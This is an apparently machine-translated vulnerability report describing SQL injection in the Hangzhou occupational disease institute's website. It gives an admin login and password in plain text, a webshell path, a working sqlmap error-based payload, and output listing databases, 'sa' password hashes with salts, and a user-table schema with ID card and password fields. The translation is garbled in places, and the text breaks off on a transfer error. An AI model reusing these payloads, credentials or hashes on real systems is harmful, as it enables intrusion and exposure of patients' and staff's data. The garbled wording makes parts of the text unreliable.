漏洞标题 杭州职业病防治研究所(壳牌)的一些漏洞涉及数十万份详细的医疗报告。 相关制造商 杭州职业病防治研究所 漏洞作者 过路人 提交时间 2016-04-26 11: 40 公共时间 2016-06-12 18: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 11 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 注射技术,背景是猜测 漏洞详细信息 杭州职业病防治研究所(gethell)某区域的泄漏泄露了数十万份详细的体检报告。 杭州职业病防治研究所的一个SQL注入漏洞发现,运行大量敏感数据是SA权限,登录网站后台,直接上传任何文件到gethell, 不同意数十万份关于医院医生的详细医疗报告和信息。 注射点:http://**。**。**。**/search /?key= 背景:http://**。**。**。**/admin admin qwertyuiop4824 Shell:http://**。**。**。**/data/files/20160425151351.aspx F4ck Sqlmap确定了以下注入点,总共有0个HTTP(s)reque Sts: --- 放置: GET 参数:键 类型:基于错误 标题: Microsoft SQL Server/Sybase和基于错误的 - WHERE或H * ING子句 有效载荷:键=%'和7049=CONVERT(INT,(CHAR(58)CHAR(120)CHAR(118)CHAR(114) CHAR(58)(SELECT(CASE WHEN(7049=7049)THEN CHAR(49)ELSE CHAR(48)END))CHAR( 58)CHAR(105)CHAR(108)CHAR(108)CHAR(58)))和'%'=' --- [10: 31: 09] [INFO]后端DBMS是Microsoft SQL Server Web服务器操作系统: Windows 2008 Web应用程序技术: ASP.NET,Microsoft IIS 7.5,ASP.NET 2.0.50727 后端DBMS: Microsoft SQL Server 2008 可用数据库[8]: [*] fzy [*] hzpcc [*]主人 [*]模型 [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb 当前数据库:'fzy' 当前用户:'sa' 数据库管理系统用户密码哈希值为: [*] ## MS_PolicyEventProcessingLogin ## [1]: 密码哈希:0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f 标头:0x0100 盐: 3869d680 Mixedcase: adf63db291c6737f1efb8e4a481b02284215913f [*] ## MS_PolicyTsqlExecutionLogin ## [1]: 密码哈希:0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f 标头:0x0100 盐: 8d22a249 Mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f [*] sa [1]: 密码哈希:0x010056049b0ef1e0c5755578b528f857fd1b3a895054a5611f69 标头:0x0100 盐: 56049b0e Mixedcase: f1e0c5755578b528f857fd1b3a895054a5611f69 数据库: fzy [24桌] + -------------------- + | TN_ACCOUNT | | TN_ARTICLE | | TN_ARTICLE_CATALOG | | TN_BOX_RECV | | TN_BOX_SEND | | TN_CGJ_BG | | TN_CGJ_DJ | | TN_COLUMN | | TN_DEPT | | TN_ENUM | | TN_GROUP | | TN_LINK | | TN_LINK_CATALOG | | TN_LY | | TN_MODULE_USER | | TN_MSG | | TN_PARAM | | TN_RECRUITMENT | | TN_TG | | TN_USER | | TN_WZ | | TN_XF | | TN_ZB | | TN_ZB_TYPE | + -------------------- +
漏洞证明: 数据库: fzy 表: TN_USER [18栏] + ---------------- + ---------- + |专栏|输入| + ---------------- + ---------- + | dept_id | varchar | | idcard | varchar | | isdelete | int | | isleader | int | |性别int | | user_birthday | datetime | | user_email | varchar | | user_id | varchar | | user_job | varchar | | user_login | varchar | | user_mobile | varchar | | user_name | varchar | | user_no | varchar | | user_office | varchar | | user_phone | varchar | | user_pic | varchar | | user_pwd | varchar | | user_virtualno | varchar | + ---------------- + ---------- + 数据库: fzy 表: TN_ACCOUNT Failure when receiving data from the peer